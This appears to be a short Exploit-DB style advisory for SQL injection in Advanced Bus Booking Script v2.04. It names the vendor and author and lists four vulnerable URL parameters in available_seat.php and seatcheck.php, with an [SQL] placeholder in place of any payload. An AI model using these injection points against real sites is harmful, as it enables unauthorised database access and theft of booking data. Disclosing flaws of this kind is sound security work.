20 lines
No EOL
740 B
Text
20 lines
No EOL
740 B
Text
# # # # #
|
|
# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 06.03.2017
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
|
|
# Demo: http://travelbookingscript.com/demo/newbusbooking/
|
|
# Version: 2.04
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
|
|
# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
|
|
# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
|
|
# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
|
|
# # # # # |